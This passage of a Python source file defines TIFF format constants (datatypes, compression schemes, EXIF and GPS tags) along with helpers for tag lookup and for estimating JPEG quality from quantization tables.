        # Expose every lookup key as an attribute of the set.
        self.__dict__.update(names)
        self._entries = entries
        self._setClass = setClass
    def __contains__(self, other):
        return hasattr(self, str(other))
    def __getattr__(self, key):
        # Fallback lookup: also accept numeric strings such as '0x10'.
        try:
            key = str(int(key, 0))
        except (ValueError, TypeError):
            pass
        try:
            return self.__dict__[key.upper()]
        except KeyError:
            raise AttributeError("'%s' object has no attribute '%s'" % (type(self).__name__, key))
    def __getitem__(self, key):
        # Item access accepts constants, numbers, or names.
        if isinstance(key, TiffConstant):
            key = int(key)
        try:
            return getattr(self, str(key))
        except AttributeError:
            raise KeyError(key)
    def get(self, key, default=None):
        """Return the constant for *key* if present, else *default*."""
        if hasattr(self, str(key)):
            return getattr(self, str(key))
        return default
    def __iter__(self):
        # Yield constants in ascending numeric order.
        for k, v in sorted(self._entries.items()):
            yield v
def get_or_create_tag(key, tagSet=None, upperLimit=True, **tagOptions):
    """
    Look *key* up in a tag set, or mint a new tag constant for it.

    If the key is unknown but converts to an integer, a new tag of the same
    class as the set's tags is created with that value.  With no tag set, a
    plain TiffConstant-style TiffTag is returned.

    :param key: the name or value of the tag to get or create.
    :param tagSet: optional TiffConstantSet with known tags.
    :param upperLimit: if True, don't allow new tags with values >= 65536.
        Such tags are used for signaling in libtiff, so this can optionally
        be allowed.
    :param **tagOptions: if the tag needs to be created and this is
        specified, add this as part of creating the tag.
    :returns: a TiffConstant.
    :raises UnknownTagError: if the key is not known and not a usable number.
    """
    if tagSet and key in tagSet:
        return tagSet[key]
    # Not a known name; try to read the key numerically — plain decimal
    # first, then any 0x/0o/0b-prefixed literal.
    try:
        numeric = int(key)
    except ValueError:
        try:
            numeric = int(key, 0)
        except ValueError:
            numeric = -1
    if tagSet and numeric in tagSet:
        return tagSet[numeric]
    outOfRange = numeric < 0 or (upperLimit and numeric >= 65536)
    if outOfRange:
        raise UnknownTagError('Unknown tag %s' % key)
    constantClass = tagSet._setClass if tagSet else TiffTag
    return constantClass(numeric, tagOptions)
# Wire-level TIFF field data types (TIFF 6.0 types 1-13 plus the BigTIFF
# 64-bit additions 16-18).  'pack' is the struct format character for one
# value, 'size' the per-value byte count.
Datatype = TiffConstantSet('TiffDatatype', {
    1: {'pack': 'B', 'name': 'BYTE', 'size': 1, 'desc': 'UINT8 - unsigned byte'},
    2: {'pack': None, 'name': 'ASCII', 'size': 1, 'desc': 'null-terminated string'},
    3: {'pack': 'H', 'name': 'SHORT', 'size': 2, 'desc': 'UINT16 - unsigned short'},
    4: {'pack': 'L', 'name': 'LONG', 'size': 4, 'desc': 'UINT32 - unsigned long', 'altnames': {'DWORD'}},
    5: {'pack': 'LL', 'name': 'RATIONAL', 'size': 8, 'desc': 'two UINT32 - two unsigned longs forming a numerator and a denominator'},
    6: {'pack': 'b', 'name': 'SBYTE', 'size': 1, 'desc': 'INT8 - signed byte'},
    7: {'pack': None, 'name': 'UNDEFINED', 'size': 1, 'desc': 'arbitrary binary data'},
    8: {'pack': 'h', 'name': 'SSHORT', 'size': 2, 'desc': 'INT16 - signed short'},
    9: {'pack': 'l', 'name': 'SLONG', 'size': 4, 'desc': 'INT32 - signed long'},
    10: {'pack': 'll', 'name': 'SRATIONAL', 'size': 8, 'desc': 'two INT32 - two signed longs forming a numerator and a denominator'},
    11: {'pack': 'f', 'name': 'FLOAT', 'size': 4, 'desc': 'binary32 - IEEE-754 single-precision float'},
    12: {'pack': 'd', 'name': 'DOUBLE', 'size': 8, 'desc': 'binary64 - IEEE-754 double precision float'},
    13: {'pack': 'L', 'name': 'IFD', 'size': 4, 'desc': 'UINT32 - unsigned long with the location of an Image File Directory'},
    16: {'pack': 'Q', 'name': 'LONG8', 'size': 8, 'desc': 'UINT64 - unsigned long long'},
    17: {'pack': 'q', 'name': 'SLONG8', 'size': 8, 'desc': 'INT64 - signed long long'},
    18: {'pack': 'Q', 'name': 'IFD8', 'size': 8, 'desc': 'UINT64 - unsigned long long with the location of an Image File Directory'},
})
# Enumerations for the values of standard TIFF fields.  Entries marked with
# 'bitfield' are bit flags; 'lossy' marks compressions that discard data.
NewSubfileType = TiffConstantSet('TiffNewSubfileType', {
    1: {'name': 'ReducedImage', 'bitfield': 1, 'desc': 'Image is a reduced-resolution version of another image in this TIFF file'},
    2: {'name': 'Page', 'bitfield': 2, 'desc': 'Image is a single page of a multi-page image'},
    4: {'name': 'Mask', 'bitfield': 4, 'desc': 'Image defines a transparency mask for another image in this TIFF file'},
    # Macro is based on Aperio's use
    8: {'name': 'Macro', 'bitfield': 8, 'desc': 'Image is an associated macro image'},
    16: {'name': 'MRC', 'bitfield': 16, 'desc': 'Mixed Raster Content'},
})
OldSubfileType = TiffConstantSet('TiffOldSubfileType', {
    1: {'name': 'Image', 'desc': 'Full-resolution image data'},
    2: {'name': 'ReducedImage', 'desc': 'Reduced-resolution image data'},
    3: {'name': 'Page', 'desc': 'A single page of a multi-page image (see the PageNumber field description'},
})
# Compression schemes; codes >= 32766 are vendor/private extensions.
Compression = TiffConstantSet('TiffCompression', {
    1: {'name': 'None', 'desc': 'No compression, but pack data into bytes as tightly as possible leaving no unused bits except at the end of a row'},
    2: {'name': 'CCITTRLE', 'desc': 'CCITT Group 3 1-Dimensional Modified Huffman run-length encoding'},
    3: {'name': 'CCITT_T4', 'altnames': {'CCITTFAX3'}, 'desc': 'CCITT Group 3 fax encoding (T4-encoding: CCITT T.4 bi-level encoding)'},
    4: {'name': 'CCITT_T6', 'altnames': {'CCITTFAX4'}, 'desc': 'CCITT Group 4 fax encoding (T6-encoding: CCITT T.6 bi-level encoding'},
    5: {'name': 'LZW'},
    6: {'name': 'OldJPEG', 'desc': 'Pre-version 6.0 JPEG', 'lossy': True},
    7: {'name': 'JPEG', 'lossy': True},
    8: {'name': 'AdobeDeflate', 'desc': 'Adobe deflate'},
    9: {'name': 'T85', 'desc': 'TIFF/FX T.85 JBIG compression'},
    10: {'name': 'T43', 'desc': 'TIFF/FX T.43 colour by layered JBIG compression'},
    32766: {'name': 'NeXT', 'desc': 'NeXT 2-bit RLE'},
    32771: {'name': 'CCITTRLEW', 'desc': '#1 w/ word alignment'},
    32773: {'name': 'Packbits', 'desc': 'Macintosh RLE'},
    32809: {'name': 'Thunderscan', 'desc': 'ThunderScan RLE'},
    32895: {'name': 'IT8CTPad', 'desc': 'IT8 CT w/padding'},
    32896: {'name': 'IT8LW', 'desc': 'IT8 Linework RLE'},
    32897: {'name': 'IT8MP', 'desc': 'IT8 Monochrome picture'},
    32898: {'name': 'IT8BL', 'desc': 'IT8 Binary line art'},
    32908: {'name': 'PixarFilm', 'desc': 'Pixar companded 10bit LZW'},
    32909: {'name': 'PixarLog', 'desc': 'Pixar companded 11bit ZIP'},
    32946: {'name': 'Deflate', 'desc': 'Deflate compression'},
    32947: {'name': 'DCS', 'desc': 'Kodak DCS encoding'},
    33003: {'name': 'JP2kYCbCr', 'desc': 'JPEG 2000 with YCbCr format as used by Aperio', 'lossy': True},
    33004: {'name': 'JP2kLossy', 'desc': 'JPEG 2000 with lossy compression as used by Bioformats', 'lossy': True},
    33005: {'name': 'JP2kRGB', 'desc': 'JPEG 2000 with RGB format as used by Aperio', 'lossy': True},
    34661: {'name': 'JBIG', 'desc': 'ISO JBIG'},
    34676: {'name': 'SGILOG', 'desc': 'SGI Log Luminance RLE'},
    34677: {'name': 'SGILOG24', 'desc': 'SGI Log 24-bit packed'},
    34712: {'name': 'JP2000', 'desc': 'Leadtools JPEG2000', 'lossy': True},
    34887: {'name': 'LERC', 'desc': 'ESRI Lerc codec: https://github.com/Esri/lerc', 'lossy': True},
    34925: {'name': 'LZMA', 'desc': 'LZMA2'},
    50000: {'name': 'ZSTD', 'desc': 'ZSTD'},
    50001: {'name': 'WEBP', 'desc': 'WEBP', 'lossy': True},
})
Photometric = TiffConstantSet('TiffPhotometric', {
    0: {'name': 'MinIsWhite', 'desc': 'Min value is white'},
    1: {'name': 'MinIsBlack', 'desc': 'Min value is black'},
    2: {'name': 'RGB', 'desc': 'RGB color model'},
    3: {'name': 'Palette', 'desc': 'Indexed color map'},
    4: {'name': 'Mask', 'desc': 'Mask'},
    5: {'name': 'Separated', 'desc': 'Color separations'},
    6: {'name': 'YCbCr', 'desc': 'CCIR 601'},
    8: {'name': 'CIELab', 'desc': '1976 CIE L*a*b*'},
    9: {'name': 'ICCLab', 'desc': 'ICC L*a*b*'},
    10: {'name': 'ITULab', 'desc': 'ITU L*a*b*'},
    32803: {'name': 'CFA', 'desc': 'Color filter array'},
    32844: {'name': 'LogL', 'desc': 'CIE Log2(L)'},
    32845: {'name': 'LogLuv', 'desc': 'CIE Log2(L) (u\',v\')'},
})
Thresholding = TiffConstantSet('TiffThresholding', {
    1: {'name': 'Bilevel', 'desc': 'No dithering or halftoning has been applied to the image data'},
    2: {'name': 'Halftone', 'desc': 'An ordered dither or halftone technique has been applied to the image data'},
    3: {'name': 'ErrorDiffuse', 'desc': 'A randomized process such as error diffusion has been applied to the image data'},
})
FillOrder = TiffConstantSet('TiffFillOrder', {
    1: {'name': 'MSBToLSB', 'desc': 'Pixels are arranged within a byte such that pixels with lower column values are stored in the higher-order bits of the byte'},
    2: {'name': 'LSBToMSB', 'desc': 'Pixels are arranged within a byte such that pixels with lower column values are stored in the lower-order bits of the byte'},
})
Orientation = TiffConstantSet('Orientation', {
    1: {'name': 'TopLeft', 'desc': 'Row 0 top, column 0 left'},
    2: {'name': 'TopRight', 'desc': 'Row 0 top, column 0 right'},
    3: {'name': 'BottomRight', 'desc': 'Row 0 bottom, column 0 right'},
    4: {'name': 'BottomLeft', 'desc': 'Row 0 bottom, column 0 left'},
    5: {'name': 'LeftTop', 'desc': 'Row 0 left, column 0 top'},
    6: {'name': 'RightTop', 'desc': 'Row 0 right, column 0 top'},
    7: {'name': 'RightBottom', 'desc': 'Row 0 right, column 0 bottom'},
    8: {'name': 'LeftBottom', 'desc': 'Row 0 left, column 0 bottom'},
})
PlanarConfig = TiffConstantSet('PlanarConfig', {
    1: {'name': 'Chunky', 'altnames': {'Contig', 'Continuous'}, 'desc': 'The component values for each pixel are stored contiguously'},
    2: {'name': 'Planar', 'altnames': {'Separate'}, 'desc': 'The components are stored in separate “component planes.'},
})
T4Options = TiffConstantSet('TiffT4Options', {
    1: {'name': '2DEncoding', 'bitfield': 1, 'desc': 'Set for two dimensional encoding'},
    2: {'name': 'Uncompressed', 'bitfield': 2, 'desc': 'Set if uncompressed mode is used'},
    4: {'name': 'FillBits', 'bitfield': 4, 'desc': 'Set if fill bits have been added'},
})
T6Options = TiffConstantSet('TiffT6Options', {
    2: {'name': 'Uncompressed', 'bitfield': 2, 'desc': 'Set if uncompressed mode is used'},
})
ResolutionUnit = TiffConstantSet('ResolutionUnit', {
    1: {'name': 'None', 'desc': 'No absolute unit of measurement'},
    2: {'name': 'Inch', 'altnames': {'in', 'inches'}},
    3: {'name': 'Centimeter', 'altnames': {'cm'}},
})
Predictor = TiffConstantSet('Predictor', {
    1: {'name': 'None', 'desc': 'No predictor'},
    2: {'name': 'Horizontal'},
    3: {'name': 'FloatingPoint'},
})
CleanFaxData = TiffConstantSet('CleanFaxData', {
    0: {'name': 'All'},
    1: {'name': 'Regenerated'},
    2: {'name': 'Present'},
})
InkSet = TiffConstantSet('InkSet', {
    1: {'name': 'CMYK'},
    2: {'name': 'NotCMYK'},
})
ExtraSamples = TiffConstantSet('ExtraSamples', {
    0: {'name': 'Unspecified'},
    1: {'name': 'AssociatedAlpha'},
    2: {'name': 'UnassociatedAlpha'},
})
SampleFormat = TiffConstantSet('SampleFormat', {
    1: {'name': 'uint', 'altnames': {'UnsignedInteger'}},
    2: {'name': 'int'},
    3: {'name': 'float', 'altnames': {'IEEEFP'}},
    4: {'name': 'Undefined'},
    5: {'name': 'ComplexInt'},
    6: {'name': 'ComplexFloat'},
})
Indexed = TiffConstantSet('Indexed', {
    0: {'name': 'NotIndexed'},
    1: {'name': 'Indexed'},
})
JPEGProc = TiffConstantSet('JPEGProc', {
    1: {'name': 'Baseline'},
    2: {'name': 'LosslessHuffman'},
})
JPEGLosslessPredictors = TiffConstantSet('JPEGLosslessPredictors', {
    1: {'name': 'A'},
    2: {'name': 'B'},
    3: {'name': 'C'},
    4: {'name': 'AplusBminusC'},
    5: {'name': 'AplusHalfBminusC'},
    6: {'name': 'BplusHalhAminusC'},
    7: {'name': 'HalfAplusB'},
})
YCbCrPositioning = TiffConstantSet('YCbCrPositioning', {
    1: {'name': 'Centered'},
    2: {'name': 'Cosited'},
})
# EXIF private IFD tags.
# Fixes relative to the previous table: the dict literal contained duplicate
# keys (34869, 36864, 36867, 36868) whose earlier entries were silently
# discarded by Python; SensitivityType was mistakenly keyed 36864 (the EXIF
# spec assigns it 0x8830 = 34864, and 36864 is ExifVersion).  Duplicates are
# merged below, keeping the names that previously won the lookup.
# NOTE(review): several vendor tags in the 65xxx range reuse standard names
# (OwnerName, SerialNumber, WhiteBalance, Contrast, Saturation, Sharpness);
# because later entries win name lookups, EXIFTag.<name> resolves to the
# 65xxx tag for those names.  Kept as-is to preserve existing behavior.
EXIFTag = TiffConstantSet(TiffTag, {
    33434: {'name': 'ExposureTime', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Exposure time'},
    33437: {'name': 'FNumber', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'F number'},
    34850: {'name': 'ExposureProgram', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Exposure program'},
    34852: {'name': 'SpectralSensitivity', 'datatype': Datatype.ASCII, 'desc': 'Spectral sensitivity'},
    34855: {'name': 'ISOSpeedRatings', 'datatype': Datatype.SHORT, 'desc': 'ISO speed rating'},
    34856: {'name': 'OECF', 'datatype': Datatype.UNDEFINED, 'desc': 'Optoelectric conversion factor'},
    34858: {'datatype': Datatype.SSHORT, 'name': 'TimeZoneOffset'},
    34859: {'datatype': Datatype.SHORT, 'name': 'SelfTimerMode'},
    34864: {'name': 'SensitivityType'},
    34865: {'datatype': Datatype.LONG, 'name': 'StandardOutputSensitivity'},
    34866: {'datatype': Datatype.LONG, 'name': 'RecommendedExposureIndex'},
    34867: {'name': 'ISOSPEED'},
    34868: {'name': 'ISOSPEEDLATITUDEYYY'},
    34869: {'datatype': Datatype.LONG, 'name': 'ISOSpeedLatitudezzz'},
    36864: {'name': 'ExifVersion'},
    36867: {'name': 'DateTimeOriginal', 'datatype': Datatype.ASCII, 'count': 20, 'desc': 'Date and time of original data'},
    36868: {'name': 'CreateDate', 'altnames': {'DateTimeDigitized'}, 'datatype': Datatype.ASCII, 'count': 20, 'desc': 'Date and time of digital data'},
    36873: {'name': 'GooglePlusUploadCode'},
    36880: {'datatype': Datatype.ASCII, 'name': 'OffsetTime'},
    36881: {'datatype': Datatype.ASCII, 'name': 'OffsetTimeOriginal'},
    36882: {'datatype': Datatype.ASCII, 'name': 'OffsetTimeDigitized'},
    37121: {'name': 'ComponentsConfiguration', 'datatype': Datatype.UNDEFINED, 'count': 4, 'desc': ' Meaning of each component'},
    37122: {'name': 'CompressedBitsPerPixel', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': ' Image compression mode'},
    37377: {'name': 'ShutterSpeedValue', 'datatype': Datatype.SRATIONAL, 'count': 1, 'desc': 'Shutter speed'},
    37378: {'name': 'ApertureValue', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Aperture'},
    37379: {'name': 'BrightnessValue', 'datatype': Datatype.SRATIONAL, 'count': 1, 'desc': 'Brightness'},
    37380: {'name': 'ExposureBiasValue', 'datatype': Datatype.SRATIONAL, 'count': 1, 'desc': 'Exposure bias'},
    37381: {'name': 'MaxApertureValue', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Maximum lens aperture'},
    37382: {'name': 'SubjectDistance', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Subject distance'},
    37383: {'name': 'MeteringMode', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Metering mode'},
    37384: {'name': 'LightSource', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Light source'},
    37385: {'name': 'Flash', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Flash'},
    37386: {'name': 'FocalLength', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Lens focal length'},
    37393: {'datatype': Datatype.LONG, 'name': 'ImageNumber'},
    37394: {'datatype': Datatype.ASCII, 'name': 'SecurityClassification'},
    37395: {'datatype': Datatype.ASCII, 'name': 'ImageHistory'},
    37396: {'name': 'SubjectArea', 'datatype': Datatype.SHORT, 'desc': 'Subject area'},
    37500: {'name': 'MakerNote', 'datatype': Datatype.UNDEFINED, 'desc': ' Manufacturer notes'},
    37510: {'name': 'UserComment', 'datatype': Datatype.UNDEFINED, 'desc': ' User comments'},
    37520: {'name': 'SubSecTime', 'datatype': Datatype.ASCII, 'desc': ' DateTime subseconds'},
    37521: {'name': 'SubSecTimeOriginal', 'datatype': Datatype.ASCII, 'desc': ' DateTimeOriginal subseconds'},
    37522: {'name': 'SubSecTimeDigitized', 'datatype': Datatype.ASCII, 'desc': ' DateTimeDigitized subseconds'},
    37888: {'datatype': Datatype.SRATIONAL, 'name': 'AmbientTemperature', 'altnames': {'Temperature'}},
    37889: {'datatype': Datatype.RATIONAL, 'name': 'Humidity'},
    37890: {'datatype': Datatype.RATIONAL, 'name': 'Pressure'},
    37891: {'datatype': Datatype.SRATIONAL, 'name': 'WaterDepth'},
    37892: {'datatype': Datatype.RATIONAL, 'name': 'Acceleration'},
    37893: {'datatype': Datatype.SRATIONAL, 'name': 'CameraElevationAngle'},
    40960: {'name': 'FlashpixVersion', 'datatype': Datatype.UNDEFINED, 'count': 4, 'desc': 'Supported Flashpix version'},
    40961: {'name': 'ColorSpace', 'datatype': Datatype.SHORT, 'count': 1, 'desc': ' Color space information'},
    40962: {'name': 'PixelXDimension', 'datatype': (Datatype.SHORT, Datatype.LONG), 'count': 1, 'desc': 'Valid image width'},
    40963: {'name': 'PixelYDimension', 'datatype': (Datatype.SHORT, Datatype.LONG), 'count': 1, 'desc': 'Valid image height'},
    40964: {'name': 'RelatedSoundFile', 'datatype': Datatype.ASCII, 'count': 13, 'desc': ' Related audio file'},
    41483: {'name': 'FlashEnergy', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Flash energy'},
    41484: {'name': 'SpatialFrequencyResponse', 'datatype': Datatype.UNDEFINED, 'desc': 'Spatial frequency response'},
    41486: {'name': 'FocalPlaneXResolution', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Focal plane X resolution'},
    41487: {'name': 'FocalPlaneYResolution', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Focal plane Y resolution'},
    41488: {'name': 'FocalPlaneResolutionUnit', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Focal plane resolution unit'},
    41492: {'name': 'SubjectLocation', 'datatype': Datatype.SHORT, 'count': 2, 'desc': 'Subject location'},
    41493: {'name': 'ExposureIndex', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Exposure index'},
    41495: {'name': 'SensingMethod', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Sensing method'},
    41728: {'name': 'FileSource', 'datatype': Datatype.UNDEFINED, 'count': 1, 'desc': 'File source'},
    41729: {'name': 'SceneType', 'datatype': Datatype.UNDEFINED, 'count': 1, 'desc': 'Scene type'},
    41730: {'name': 'CFAPattern', 'datatype': Datatype.UNDEFINED, 'desc': 'CFA pattern'},
    41985: {'name': 'CustomRendered', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Custom image processing'},
    41986: {'name': 'ExposureMode', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Exposure mode'},
    41987: {'name': 'WhiteBalance', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'White balance'},
    41988: {'name': 'DigitalZoomRatio', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Digital zoom ratio'},
    41989: {'name': 'FocalLengthIn35mmFilm', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Focal length in 35 mm film'},
    41990: {'name': 'SceneCaptureType', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Scene capture type'},
    41991: {'name': 'GainControl', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Gain control'},
    41992: {'name': 'Contrast', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Contrast'},
    41993: {'name': 'Saturation', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Saturation'},
    41994: {'name': 'Sharpness', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Sharpness'},
    41995: {'name': 'DeviceSettingDescription', 'datatype': Datatype.UNDEFINED, 'desc': 'Device settings description'},
    41996: {'name': 'SubjectDistanceRange', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Subject distance range'},
    42016: {'name': 'ImageUniqueID', 'datatype': Datatype.ASCII, 'count': 33, 'desc': ' Unique image ID'},
    42032: {'datatype': Datatype.ASCII, 'name': 'OwnerName'},
    42033: {'datatype': Datatype.ASCII, 'name': 'SerialNumber'},
    42034: {'datatype': Datatype.RATIONAL, 'name': 'LensInfo'},
    42035: {'datatype': Datatype.ASCII, 'name': 'LensMake'},
    42036: {'datatype': Datatype.ASCII, 'name': 'LensModel'},
    42037: {'datatype': Datatype.ASCII, 'name': 'LensSerialNumber'},
    42080: {'datatype': Datatype.SHORT, 'name': 'CompositeImage'},
    42081: {'datatype': Datatype.SHORT, 'name': 'CompositeImageCount'},
    42082: {'name': 'CompositeImageExposureTimes'},
    42240: {'datatype': Datatype.RATIONAL, 'name': 'Gamma'},
    59932: {'name': 'Padding'},
    59933: {'datatype': Datatype.SLONG, 'name': 'OffsetSchema'},
    65000: {'datatype': Datatype.ASCII, 'name': 'OwnerName'},
    65001: {'datatype': Datatype.ASCII, 'name': 'SerialNumber'},
    65002: {'datatype': Datatype.ASCII, 'name': 'Lens'},
    65100: {'datatype': Datatype.ASCII, 'name': 'RawFile'},
    65101: {'datatype': Datatype.ASCII, 'name': 'Converter'},
    65102: {'datatype': Datatype.ASCII, 'name': 'WhiteBalance'},
    65105: {'datatype': Datatype.ASCII, 'name': 'Exposure'},
    65106: {'datatype': Datatype.ASCII, 'name': 'Shadows'},
    65107: {'datatype': Datatype.ASCII, 'name': 'Brightness'},
    65108: {'datatype': Datatype.ASCII, 'name': 'Contrast'},
    65109: {'datatype': Datatype.ASCII, 'name': 'Saturation'},
    65110: {'datatype': Datatype.ASCII, 'name': 'Sharpness'},
    65111: {'datatype': Datatype.ASCII, 'name': 'Smoothness'},
    65112: {'datatype': Datatype.ASCII, 'name': 'MoireFilter'},
})
# GPS Info IFD tags (pointed at by the GPSIFD tag of the main IFD).
GPSTag = TiffConstantSet(TiffTag, {
    0: {'name': 'GPSVersionID', 'datatype': Datatype.BYTE, 'count': 4, 'desc': 'GPS tag version'},
    1: {'name': 'GPSLatitudeRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'North or South Latitude'},
    2: {'name': 'GPSLatitude', 'datatype': Datatype.RATIONAL, 'count': 3, 'desc': 'Latitude'},
    3: {'name': 'GPSLongitudeRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'East or West Longitude'},
    4: {'name': 'GPSLongitude', 'datatype': Datatype.RATIONAL, 'count': 3, 'desc': 'Longitude'},
    5: {'name': 'GPSAltitudeRef', 'datatype': Datatype.BYTE, 'count': 1, 'desc': 'Altitude reference'},
    6: {'name': 'GPSAltitude', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Altitude'},
    7: {'name': 'GPSTimeStamp', 'datatype': Datatype.RATIONAL, 'count': 3, 'desc': 'GPS time (atomic clock)'},
    8: {'name': 'GPSSatellites', 'datatype': Datatype.ASCII, 'desc': 'GPS satellites used for measurement'},
    9: {'name': 'GPSStatus', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'GPS receiver status'},
    10: {'name': 'GPSMeasureMode', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'GPS measurement mode'},
    11: {'name': 'GPSDOP', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Measurement precision'},
    12: {'name': 'GPSSpeedRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Speed unit'},
    13: {'name': 'GPSSpeed', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Speed of GPS receiver'},
    14: {'name': 'GPSTrackRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for direction of movement'},
    15: {'name': 'GPSTrack', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Direction of movement'},
    16: {'name': 'GPSImgDirectionRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for direction of image'},
    17: {'name': 'GPSImgDirection', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Direction of image'},
    18: {'name': 'GPSMapDatum', 'datatype': Datatype.ASCII, 'desc': 'Geodetic survey data used'},
    19: {'name': 'GPSDestLatitudeRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for latitude of destination'},
    20: {'name': 'GPSDestLatitude', 'datatype': Datatype.RATIONAL, 'count': 3, 'desc': 'Latitude of destination'},
    21: {'name': 'GPSDestLongitudeRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for longitude of destination'},
    22: {'name': 'GPSDestLongitude', 'datatype': Datatype.RATIONAL, 'count': 3, 'desc': 'Longitude of destination'},
    23: {'name': 'GPSDestBearingRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for bearing of destination'},
    24: {'name': 'GPSDestBearing', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Bearing of destination'},
    25: {'name': 'GPSDestDistanceRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for distance to destination'},
    26: {'name': 'GPSDestDistance', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Distance to destination'},
    27: {'name': 'GPSProcessingMethod', 'datatype': Datatype.UNDEFINED, 'desc': 'Name of GPS processing method'},
    28: {'name': 'GPSAreaInformation', 'datatype': Datatype.UNDEFINED, 'desc': 'Name of GPS area'},
    29: {'name': 'GPSDateStamp', 'datatype': Datatype.ASCII, 'count': 11, 'desc': 'GPS date'},
    30: {'name': 'GPSDifferential', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'GPS differential correction'},
    31: {'name': 'GPSPositioningError', 'desc': 'Indicates horizontal positioning errors in meters'},
})
# Interoperability IFD tags (pointed at by the InteroperabilityIFD tag).
InteroperabilityTag = TiffConstantSet(TiffTag, {
    1: {'name': 'InteroperabilityIndex', 'datatype': Datatype.ASCII},
})
def EstimateJpegQuality(jpegTables):
    """Estimate the JPEG quality setting from a JPEGTables tag value.

    The blob is scanned for the first DQT (Define Quantization Table,
    0xFFDB) segment; the quality is derived from entries of the first
    quantization table (table id 0).

    :param jpegTables: raw bytes of the JPEGTables tag value.
    :returns: an integer quality estimate, or None if no usable
        quantization table is present or the data is malformed.
    """
    try:
        # Everything after the first DQT marker; empty if no marker exists,
        # which makes the length unpack below fail and we return None.
        segment = jpegTables.partition(b'\xff\xdb')[2]
        seglen = struct.unpack('>H', segment[:2])[0]
        table = segment[2:seglen]
        # High nibble: precision (0 = 8-bit, nonzero = 16-bit entries);
        # low nibble: table id.  Only process the first table (id 0).
        precision_and_id = table[0]
        if precision_and_id & 0xF:
            return None
        width = 2 if precision_and_id else 1
        fmt = '>64' + ('H' if precision_and_id else 'B')
        values = struct.unpack(fmt, table[1:1 + 64 * width])
        if values[58] < 100:
            return int(100 - values[58] / 2)
        return int(5000.0 / 2.5 / values[15])
    except Exception:
        # Malformed or truncated table data: no estimate.
        return None
# Baseline, extension, and vendor-specific TIFF tags, keyed by tag number.
# Entries may carry a datatype (or tuple of permitted datatypes), a fixed
# count, an enum/bitfield class, a default, and a human-readable description.
Tag = TiffConstantSet(TiffTag, {
    254: {'name': 'NewSubfileType', 'altnames': {'SubfileType'}, 'datatype': Datatype.LONG, 'count': 1, 'bitfield': NewSubfileType, 'desc': 'A general indication of the kind of data contained in this subfile', 'default': 0},
    255: {'name': 'OldSubfileType', 'datatype': Datatype.SHORT, 'count': 1, 'enum': OldSubfileType, 'desc': 'A general indication of the kind of data contained in this subfile. See NewSubfileType'},
    256: {'name': 'ImageWidth', 'datatype': (Datatype.SHORT, Datatype.LONG), 'count': 1, 'desc': 'The number of columns in the image, i.e., the number of pixels per scanline'},
    257: {'name': 'ImageLength', 'altnames': {'ImageHeight'}, 'datatype': (Datatype.SHORT, Datatype.LONG), 'count': 1, 'desc': 'The number of rows (sometimes described as scanlines) in the image'},
    258: {'name': 'BitsPerSample', 'datatype': Datatype.SHORT, 'desc': 'Number of bits per component', 'default': 1},
    259: {'name': 'Compression', 'datatype': Datatype.SHORT, 'count': 1, 'enum': Compression, 'desc': 'Compression scheme used on the image data'},
    262: {'name': 'Photometric', 'datatype': Datatype.SHORT, 'count': 1, 'enum': Photometric, 'desc': 'The color space of the image data'},
    263: {'name': 'Threshholding', 'datatype': Datatype.SHORT, 'count': 1, 'enum': Thresholding, 'desc': 'For black and white TIFF files that represent shades of gray, the technique used to convert from gray to black and white pixels'},
    264: {'name': 'CellWidth', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'The width of the dithering or halftoning matrix used to create a dithered or halftoned bilevel file'},
    265: {'name': 'CellLength', 'altnames': {'CellHeight'}, 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'The length of the dithering or halftoning matrix used to create a dithered or halftoned bilevel file'},
    266: {'name': 'FillOrder', 'datatype': Datatype.SHORT, 'count': 1, 'enum': FillOrder, 'desc': 'The logical order of bits within a byte'},
